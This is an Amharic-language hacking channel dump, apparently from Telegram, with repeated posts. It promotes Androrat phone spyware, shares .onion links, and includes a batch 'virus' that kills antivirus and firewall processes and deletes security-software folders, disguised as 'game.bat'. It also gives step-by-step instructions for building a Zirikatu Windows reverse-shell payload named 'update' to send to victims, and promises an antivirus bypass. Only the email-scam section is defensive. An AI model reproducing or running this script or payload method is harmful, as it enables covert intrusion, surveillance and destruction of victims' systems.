አስታዉሱሀኪንግ በአንድ ምሽት master ምናደርገዉ ነገር አይደለም በጣም ትግስት እና hard work ይፈልጋል ብዙ ጊዜ ከአዳዲስ ሀከሮች የማየው ችግር በትንሽ ስራ ትልቅ ዉጤት ይጠብቃሉ ይሄ ደሞ የማይሆን ነዉ ስለዚህ አንድ የሀኪንግ topic ከያዝን ያን topic በደንብ master እስክናደርዉ አንዲሁም በተግባር እስኪሳካልን ድረስ በደንብ መለማመድ ይጠበቅብናል ይሄን የምናደርግ ከሆነ እራሳችን ላይ ለዉጡን በፍጥነት ማየት እንችላለን። በተለይምhacker ለመሆን ከ 5 በላይ የ programming languages ማወቅ ያስፈልገናል ስለዚህ ከ programming ጀምሩ...ደሞለ ደና ነገር ተጠቀሙት
Share ማረግ እንዳይረሱ
@betselotxo
⏺ ሀከር ማለት አንድ ግለሰብ ወይም ቡድን አንድን ኮምፒዉተር ወይም የኮምፒዉተር ኔትወርክ ለራሱ ትርፍ ወይም ለመዝናናት ሰብሮ የሚገባ ነዉ።
♻️ የሀከር አይነቶች | Types of Hackers
ሀከሮች በሶስት ወሳኝ አይነቶች ይከፈላሉ :-
⚪️White Hat Hackers :-እነዚህ ሀከሮች የሀኪንግ እዉቀታቸዉን ተጠቅመዉ ህገወጥ የመረጃ ብርበራ የማያደርጉ ናቸዉ ስለዚህ ጥሩ ሀከሮች ነዉ የሚባሉት እንዲሁም Security expert በመባል ይታወቃሉ።
⚫️ Black Hat Hackers :-የነዚህ አይነት ሀከሮች ብዙ ጊዜ crackers ይባላሉ እነዚህ ሀከሮች የሀኪንግ እዉቀታቸዉን ተጠቅመዉ ህገወጥ ተግባራትን ያከናዉናሉ ለምሳሌ ልክ እነደ credit card ዘረፋ ባንኮችን ሀክ ማድረግ ወዘተ ክሬዲት ካርድ ዘረፋ ላይ የሚሳተፉ ሀከሮች ካርደር ይባላሉ ሌላ ጊዜ በሰፊዉ እንቃኛቸዋለን።
🔘 Grey Hat Hackers :-ግሬይ ሀት የምንላቸዉ በwhite hat እና በblack hat መካከል የሚገኙ hybrid ናቸዉ ይህም ማለት አንዳንዴ black hat አንዳነዴ ደሞ white hat ሀከርስ ይወላዉላሉ ማለት ነዉ
☑️ የሀከሮች ደረጃ | Hacker Hierarchy
❇️ Scriptkiddies :-እነዚህ የሀኪንግ ልምድ የሌላቸዉ ግለሰቦች / ቡድን ግን ሀከር መሆን የሚፈልጉ ናቸዉ ሀክ ለማድረግ የሚጠቀሙትም ready made tool ወይም የተዘጋጀ ሶፍትዌር ነዉ በዙ ጊዜም ልምድ ስለሌላቸዉ እራሳቸዉን harm ያደርጋሉ አንድ ታዋቂ ጥቅስ አለ "Little knowledge is dangerous" ይህም ብዙ ጊዜ የምናየዉ ችግር ነዉ።
❇️ Intermediate hackers :-ከscriptkiddies የበለጠ የሀኪንግ ልምድ እንዲሁም እዉቀት ያላቸዉ ሀከሮች ናቸዉ ግን የራሳቸዉን exploit ወይም የሀኪንግ ሶፍትዌር መስራት አይችሉም ቢሆንም ጥሩ ልምድ ያላቸዉ ሀከሮች ናቸዉ።
❇️ Professional or Elite hackers :-እነዚህ ልምድ ያላቸዉ ሀከሮች የራሳቸዉን exploit ወይም የሀኪንግ ሶፍትዌር መስራት ይችላሉ ስለሆነም የትኛዉም አይነት system ሰብረዉ መግባትና ራሳቸዉን የመደበቅ ልምድ አላቸዉ።
🖥 ሀከር ለመሆን ምን ይጠበቅብናል?| What Takes to Become a Hacker?
አስታዉሱሀኪንግ በአንድ ምሽት master ምናደርገዉ ነገር አይደለም በጣም ትግስት እና hard work ይፈልጋል ብዙ ጊዜ ከአዳዲስ ሀከሮች የማየው ችግር በትንሽ ስራ ትልቅ ዉጤት ይጠብቃሉ ይሄ ደሞ የማይሆን ነዉ ስለዚህ አንድ የሀኪንግ topic ከያዝን ያን topic በደንብ master እስክናደርዉ አንዲሁም በተግባር እስኪሳካልን ድረስ በደንብ መለማመድ ይጠበቅብናል ይሄን የምናደርግ ከሆነ እራሳችን ላይ ለዉጡን በፍጥነት ማየት እንችላለን። በተለይምhacker ለመሆን ከ 5 በላይ የ programming languages ማወቅ ያስፈልገናል ስለዚህ ከ programming ጀምሩ...ደሞለ ደና ነገር ተጠቀሙት
Share ማረግ እንዳይረሱ
@betselotxo
🎭ብዙ ሀከሮች የአንድሮይድ ስልካችንን ለመጥለፍ ተመርጭ የሆነው መተግበሪያ Androrat ነው ይላሉ ።
🖥Androrat (Android Remote Administration Tool)፦በjava የተጻፈ ሲሆን በአንድ ኮምፒውተር አንድን የአንድሮይድ ሙሉ ለሙሉ ለመቆጣጠር ያስችላል።
🎱 ይህ መተግበሪያ የተሰራው ወላጆች ልጆቻቸውን የAndroid operating system እንዲቆጣጠሩ ነዉ ።
🖥የህ የኮምፒውተር መተግበሪያ (Androrat apk binder)የርሱ የሆኑ malaware program አለው
🖥(androrat apk binder )ታዋቂ ከሆነ ከአንድ አንድሮይድ አፕሊኬሽን ጋር (telegram,gallery...) የራሱን ማልዌር በማካተት የአንድሮይድ መተግበሪያ ዉሰጥ የራሱን ስራ ይሰራል
ምን ምን ሓክ (hacke)እናራጋለን 🔴ነገሮችን በዋነኝነት ሃክ ማረግ ይቻላል
🔴contactማስተካከል ,መሰረዝ ,መመዝገብ ይቻላል
🔴 በሰዉየዉ ስልክ ኢንተርኔትመጠቀም ይቻላል
🔴 vibrate ማረግ ይቻላል
🔴 ሚሴጅ ማንበብ ,መጻፍ
🔴 ስልኩ የለበትን ቦታ ማወቅ በGps ተጠቅመን
🔴 የስልኩን ፊተኛ እና የሗላ ኮሜሪ video መቅዳት ወይንም live መቅዳት
🔴 ፎቶ ማንሳት
🔴 በሰዉየዉ ስልክ መደወል
🔴 ድምጽ መቅዳተ እንችላለን
@betselotxo
🖥Androrat (Android Remote Administration Tool)፦በjava የተጻፈ ሲሆን በአንድ ኮምፒውተር አንድን የአንድሮይድ ሙሉ ለሙሉ ለመቆጣጠር ያስችላል።
🎱 ይህ መተግበሪያ የተሰራው ወላጆች ልጆቻቸውን የAndroid operating system እንዲቆጣጠሩ ነዉ ።
🖥የህ የኮምፒውተር መተግበሪያ (Androrat apk binder)የርሱ የሆኑ malaware program አለው
🖥(androrat apk binder )ታዋቂ ከሆነ ከአንድ አንድሮይድ አፕሊኬሽን ጋር (telegram,gallery...) የራሱን ማልዌር በማካተት የአንድሮይድ መተግበሪያ ዉሰጥ የራሱን ስራ ይሰራል
ምን ምን ሓክ (hacke)እናራጋለን 🔴ነገሮችን በዋነኝነት ሃክ ማረግ ይቻላል
🔴contactማስተካከል ,መሰረዝ ,መመዝገብ ይቻላል
🔴 በሰዉየዉ ስልክ ኢንተርኔትመጠቀም ይቻላል
🔴 vibrate ማረግ ይቻላል
🔴 ሚሴጅ ማንበብ ,መጻፍ
🔴 ስልኩ የለበትን ቦታ ማወቅ በGps ተጠቅመን
🔴 የስልኩን ፊተኛ እና የሗላ ኮሜሪ video መቅዳት ወይንም live መቅዳት
🔴 ፎቶ ማንሳት
🔴 በሰዉየዉ ስልክ መደወል
🔴 ድምጽ መቅዳተ እንችላለን
@betselotxo
ሰወች በብዙሃን ጥያቄ መሰረት የDark web link ይዤላችሁ መጥቻለሁ ነገር ግን Dark web ላይ ስትገቡ ማንኛውም ጥቃት @betselotxo ሀላፌነት አይወስድም።
እና ከላይ ያለውን ማስጠንቀቂያ እንዳትእንዳትረሱ!!
ጥያቄ ካላቹ @betselotxo ላይ inbox አድርጉ
Hi, selam, hello ለሚል መልስ አንሰጥም።
Dark web link 👇👇
http://dktubezytam2tuxu.onion/v/ti9KFo
ይሄካልሰራላችሁ በዚ ሞክሩ 👇👇
http://dktubezytam2tuxu.onion/v/ya44h
እኔ የለሁበትም 🙅🙅
እና ከላይ ያለውን ማስጠንቀቂያ እንዳትእንዳትረሱ!!
ጥያቄ ካላቹ @betselotxo ላይ inbox አድርጉ
Hi, selam, hello ለሚል መልስ አንሰጥም።
Dark web link 👇👇
http://dktubezytam2tuxu.onion/v/ti9KFo
ይሄካልሰራላችሁ በዚ ሞክሩ 👇👇
http://dktubezytam2tuxu.onion/v/ya44h
እኔ የለሁበትም 🙅🙅
5 ኢሜይል ኣካውንታችን ሀክ ሲደረግ /
email/
ኢሜይል አካውንት በተለያዪ ምክንያቶች ሃክ ሊደርግ ይችላል
በዚህም ምክንያት በአጭበርባሪዎች እጅ ይወድቃል::
አጭበርባሪዎቹ ሀክ በተደረገ ኢሜይላችን ይገቡና: በብዛት ከማን
ጋር ኢሜይል እንደተላላክን: የተላላክነው የኢሜይል ይዘት ምን
ይመስላል? ሀክ የተደረገው ኢሜይል ባሌበት የት ነው
የሚኖረው? ወዘተ ይመረምሩታል:: ካዛማ አንድ አስደንጋጭ
ኢይሜይል በቅርበት ለምናውቀው ሰው መጻፍ ነዋ!
ለምሰሌ: አንድ በፈረንሳይ የሚኖር ሰዉ “ኤልያስ” ከአንድ ሌላ
ሀገር የሚኖር ሰዉ “ዘዉዱ” በኢሜይል ብዙ ጊዜ ያወራሉ:
በጣም ይቀራረባሉ እንበል::
አሁን የኤልያስ ኢሜይል “ሀክ” ተደረገ እንበል:: ሃከሩ እንዲህ
ብሎ ለዘዉዱ ኢሜይል ይጽፍለታል::
“እንዴት ነህ ? በጣም መጥፎ ገጠመኝ ነው ያጋጠመኝ::
ከፈረንሳይ ወደ ጀርመን ለአጭር ጉቡኝት ሂጃሎ:: ጀርመን
ውስጥ ያጋጠመኝ ነገር ግን በጣም አናድዶኛል:: ክሬዲት
ካርዴን: በእጄ የነበረው ካሽና ስልኬ ዘረፉኝ:: ነገር ግን እንደ
እድል ሆኖ ፓስፖርቴ ይዛሎ:: ፖሊስም ሆነ ኢምባሲ
እንዲያግዘኝ ብሞክረም ምንም ወፍ የለም:: በረራየ ደግሞ ነገ
ጥዋት ላይ ነው:: እና አሁን ያለሁበት ሆቴል ለተጠቀምኩበት
አገልግሎት ሂሳብ ካልከፈልኩ መዉጣት ስለማልችል : እባክህን
እርዳታህን በዚህ አስቸጋሪ ሰአት እፈልጋለሁኝ::
እባክህን ፈጥነህ ከዚህ አዉጣኝ,ኤልያስ”
ይህ ኢሜይል የደረሰዉ ዘዉዱ ደንገጥ ብሎ ገንዘብ ይልክ
ይሆን…?
መፍትሄ: እንዲዚህ አይነት መልእክት ያለው ኢሜይል
ከምናዉቀው ሰዉ ሲደርሰን መልሰን በተላከልን ኢሜይል መልስ
መስጠት የለብንም እንዲሁም ቸኩለን መክፈል የለብንም
ኢሜይሉ ሀክ ተደርጎ የሆናል ብለን በማሳብ እርዳታ የጠየቀንን
ሰዉ ማግኘት ያለብን ከኢሜይል ዉጪ ባሉ የመገናኛ ዜዴዎች
ተጠቅመን ማጠራት አለብን!
💥💥💥ተፈጸመ 💥💥💥
ጋይስ እንዴት ነበር ተማራችሁበት
@betselotxo
email/
ኢሜይል አካውንት በተለያዪ ምክንያቶች ሃክ ሊደርግ ይችላል
በዚህም ምክንያት በአጭበርባሪዎች እጅ ይወድቃል::
አጭበርባሪዎቹ ሀክ በተደረገ ኢሜይላችን ይገቡና: በብዛት ከማን
ጋር ኢሜይል እንደተላላክን: የተላላክነው የኢሜይል ይዘት ምን
ይመስላል? ሀክ የተደረገው ኢሜይል ባሌበት የት ነው
የሚኖረው? ወዘተ ይመረምሩታል:: ካዛማ አንድ አስደንጋጭ
ኢይሜይል በቅርበት ለምናውቀው ሰው መጻፍ ነዋ!
ለምሰሌ: አንድ በፈረንሳይ የሚኖር ሰዉ “ኤልያስ” ከአንድ ሌላ
ሀገር የሚኖር ሰዉ “ዘዉዱ” በኢሜይል ብዙ ጊዜ ያወራሉ:
በጣም ይቀራረባሉ እንበል::
አሁን የኤልያስ ኢሜይል “ሀክ” ተደረገ እንበል:: ሃከሩ እንዲህ
ብሎ ለዘዉዱ ኢሜይል ይጽፍለታል::
“እንዴት ነህ ? በጣም መጥፎ ገጠመኝ ነው ያጋጠመኝ::
ከፈረንሳይ ወደ ጀርመን ለአጭር ጉቡኝት ሂጃሎ:: ጀርመን
ውስጥ ያጋጠመኝ ነገር ግን በጣም አናድዶኛል:: ክሬዲት
ካርዴን: በእጄ የነበረው ካሽና ስልኬ ዘረፉኝ:: ነገር ግን እንደ
እድል ሆኖ ፓስፖርቴ ይዛሎ:: ፖሊስም ሆነ ኢምባሲ
እንዲያግዘኝ ብሞክረም ምንም ወፍ የለም:: በረራየ ደግሞ ነገ
ጥዋት ላይ ነው:: እና አሁን ያለሁበት ሆቴል ለተጠቀምኩበት
አገልግሎት ሂሳብ ካልከፈልኩ መዉጣት ስለማልችል : እባክህን
እርዳታህን በዚህ አስቸጋሪ ሰአት እፈልጋለሁኝ::
እባክህን ፈጥነህ ከዚህ አዉጣኝ,ኤልያስ”
ይህ ኢሜይል የደረሰዉ ዘዉዱ ደንገጥ ብሎ ገንዘብ ይልክ
ይሆን…?
መፍትሄ: እንዲዚህ አይነት መልእክት ያለው ኢሜይል
ከምናዉቀው ሰዉ ሲደርሰን መልሰን በተላከልን ኢሜይል መልስ
መስጠት የለብንም እንዲሁም ቸኩለን መክፈል የለብንም
ኢሜይሉ ሀክ ተደርጎ የሆናል ብለን በማሳብ እርዳታ የጠየቀንን
ሰዉ ማግኘት ያለብን ከኢሜይል ዉጪ ባሉ የመገናኛ ዜዴዎች
ተጠቅመን ማጠራት አለብን!
💥💥💥ተፈጸመ 💥💥💥
ጋይስ እንዴት ነበር ተማራችሁበት
@betselotxo
ሰላም ዛሬ ደግሞ ቫይረስ እንዴት መስራት አንደሚቻል ኣሳያችኋለሁ
✅ መጀመሪያ የኮምፒውተራቹን Notepad
ክፈቱት በመቀጠል ይህንን ኮድ ኮፒ አርጋችሁ
Notepad ላይ ፔስት አርጉት
@ echo off
rem
rem Permanently Kill Anti-Viru
net stop “Security Center”
netsh firewall set opmode mode
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\al
del /Q /F C:\Program Files\La
del /Q /F C:\Program Files\ka
cls
del /Q /F C:\Program Files\tr
del /Q /F C:\Program Files\f-
del /Q /F C:\Program Files\tb
del /Q /F C:\Program Files\av
del /Q /F C:\Program Files\No
del /Q /F C:\Program Files\Mc
cls
del /Q /F C:\Program Files\No
del /Q /F C:\Program Files\No
del /Q /F C:\Program Files\No
del /Q /F C:\Program Files\No
cls
del /Q /F C:\Program Files\av
del /Q /F C:\Program Files\av
del /Q /F C:\Program Files\av
cls
del /Q /F C:\Program Files\av
del /Q /F C:\Program Files\av
del /Q /F C:\Program Files\gr
del /Q /F C:\Program Files\no
del /Q /F C:\Program Files\no
cls
del /Q /F C:\Program Files\no
del /Q /F C:\Program Files\no
del /Q /F C:\Program Files\ka
del /Q /F C:\Program Files\ka
del /Q /F C:\Program Files\ka
cls
del /Q /F C:\Program Files\ew
del /Q /F C:\Program Files\gu
del /Q /F C:\Program Files\ew
cls
del /Q /F C:\Program Files\pa
del /Q /F C:\Program Files\pa
del /Q /F C:\Program Files\av
cls
del /Q /F C:\Program Files\ap
del /Q /F C:\Program Files\we
del /Q /F C:\Program Files\pa
software\*.*
rem
ይሄንን ኮድ በሚገባ ከፃፍችሁ በሁዋላ any name.bat ብላችሁ ሴቭ ኣድር
ለምሳሌ game.bat ብላቹ
ይህ ኮድ ከተከፈተ ኮምፒዩተሩ ያሉ #Anti viruሶች በሙሉ ያጠፋል ከዛ የፈለጋችሁትን ቫይረስ ማስገባት ትችላላችሁ
ይቀጥላል.......

How to #Hack Windows Computer using Kali Linux?
=======================
ዉድ የዚ Channel ተከታታዮች በባለፈው post ላይ እንዴት kali linux operating system እንደምንጭን አይተን ነበር አሁን ደሞ Kali Linux operating system በመጠቀም እንዴት የwindows operating system hack ማድረግ እንደምንችል እናያለን::
🔰Requirements
—> Kali Linux OS
—> Zirikatu script shell
📛📛📛📛Let’s start📛📛📛📛📛
〽️በመጀመሪያ Zirikatu script shell file download ማረግ እና Kali Linux Desktop ላይ ማስቀመጥ
〽️በመቀጠል ፎልደሩን መክፈት
〽️ከዛ ፎልደሩ ዉስጥ ባዶ ቦታ ላይ right click በማድረግ open terminal የሚለዉን ምርጫ መምረጥ ከዛም አዲስ የtermina windows ይከፈታል
〽️Type “ls” without quotations hit enter
〽️Type “chmod +x zirikatu.sh” without quotations hit enter
〽️Type “./zirikatu.sh” without quotations hit enter
〽️Select a payload number የሚለው ምርጫ ጋር Type “1” without quotations and hit enter
〽️Set Lhost: የሚለው ምርጫ ጋር የኮምፒተሩን ip address ማስገባት
>〽️ኮምፒተሩን ip address ለማወቅ ከፈለግን አዲስ terminal ከፍተን ipconfig ብለን በመጻፍ ማወቅ እንችላለን
〽️Set lport: የሚለው ምርጫ ጋር Type “4444” without quotations and hit enter
〽️Do you want to change the payload icon? የሚለው ምርጫ ጋር Type “n” without quotations and hit enter
〽️Display an error message? የሚለው ምርጫ ጋር Type “n” without quotations and hit enter
〽️Enter the output file name: የሚለው ምርጫ ጋር Type “update” without quotations and hit enter
〽️Do you start the payload handler? የሚለው ምርጫ ጋር Type “y” without quotations and hit enter
የሰራነዉን payload download ያረግነው ፎልደር ዉስጥ output የሚል ፎልደር ዉስጥ እናገኘዋለን::
ከዚ በኋላ ሁሉም ነገር ዝግጁ ሆኗል ማለት ነው ስለዚ የሰራነዉን payload hack ማረግ ለምንፈልገው ሰው መላክ ብቻ ነው ሚጠበቅብን:: hack ሚደረገው ሰው ልክ ፋይሉን ሲከፍተው እኛ የ ኮምፒተሩ ሙሉ access ይኖረናል ማለት ነው::
ሆኖም ግን ተጠቂው update የሆነ antivirus ካለው የምንልክለትን payload anti-virusሱ በቀላሉ ሊያጠፋብን ይችላል:: ብዙዎቹን antivirus ሞክሬያቸዋለው የ windows 10 update የሆነው windows defender ብቻ detect አርጎታል:: በሌላኛው ፖስቴ እሱን ማለፍ የሚያስችል ዘዴ ይዤ እንደምቀርብ ተስፋ አረጋለው::
#Kali_Linux
#Computer #Trick
#Credit #Elloit

This media is not supported in your browser
VIEW IN TELEGRAM